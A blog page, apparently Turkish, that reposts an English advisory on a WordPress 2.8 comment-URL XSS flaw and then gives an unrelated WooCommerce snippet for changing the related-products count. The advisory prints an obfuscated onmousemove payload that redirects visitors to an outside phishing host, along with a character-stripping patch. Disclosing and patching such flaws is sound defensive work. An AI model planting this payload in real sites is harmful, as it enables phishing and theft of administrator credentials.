WordPress 2.8 All version XSS 0DAY 0

It had been published that wordpress 2.8 All version are suffering from Xss,attackers can use this to do fishing,they make a wordpress login page as it is your own.If you don’t take care,your password will be sent to the attacker’s website.With your password,they can edit pages and upload webshell.It is harmful.

How is the attacker do this?
they insert website url like this(in the comments write place):

http://www.vul.kr’ onmousemove=’location.href=String.fromCharCode(104,116,116,112,58,47,47,119,119,119,46,118,117,108,46,107,114,47,63,112,61,53,54,57);

If someone(or administrator) moved his mouse on the author’s website.It will jump to another URL,which is a fishing page.

How can we patch it?
Edit wp-comments-post.php
go line 40 and then add:
$comment_author_url = str_replace(chr(39),”,$comment_author_url);
$comment_author_url = str_replace(chr(59),”,$comment_author_url);
$comment_author_url = str_replace(chr(44),”,$comment_author_url);


wordpress-0day-patch

Webmasters,please patch it as soon as you can.

Kaynak: WordPress 2.8 All Version Xss 0DAY

Bir yanıt yazın

E-posta adresiniz yayınlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

Bu site, istenmeyenleri azaltmak için Akismet kullanıyor. Yorum verilerinizin nasıl işlendiği hakkında daha fazla bilgi edinin.

WooCommerce Benzer Yazılar Sayısını Değiştirme 0

woocommerce benzer yazilar sayisi

Merhaba arkadaşlar, WooCommerce biliyorsunuz WordPress Eticaret eklentileri arasında en iyisi. Geçen gün bu eklentiyi kullandım ama benzer yazılarda 1 tane çıkıyordu biraz araştıriyim derken bu fonksiyonu buldum.

Temanızın fonksiyon dosyasına alttaki gibi uyarlarsanız benzer yazıların sayısını belirleyebilirsiniz.

Kodda ürün ve kolon sayısı belirliyorsunuz. Örneğin: 10 ürün, 3 kolon yapabiliyorsunuz bu seçenek tamamiyle size kalmış.

Örnek 1) 4 Ürün, 2 Kolon

// Woocommerce eticaret sistemi, benzer ürün sayısı - rooteto.com
 function woocommerce_output_related_products() {
 woocommerce_related_products(4,2);       // 4 ürün, 2 kolon
 }

https://3.bp.blogspot.com/-NAJsLI4L0OE/VMkvLGyvMsI/AAAAAAAAbmQ/V-uyxz4IG-k/s1600/woocommerce-benzer-yazilar-sayisi.jpg

Örnek 2) 4 Ürün, 4 Kolon

// Woocommerce eticaret sistemi, benzer ürün sayısı - rooteto.com
function woocommerce_output_related_products() {
woocommerce_related_products(4,4);   // 4 ürün, 4 kolon
}

https://4.bp.blogspot.com/-WBlh6I37dVI/VMkvKwvvfuI/AAAAAAAAbmM/2wPmiaqt09Y/s1600/woocommerce-benzer-yazilar-related.jpg

Kaynak: Change the Number of Woocommerce Related Products

Most Popular Topics

Editor Picks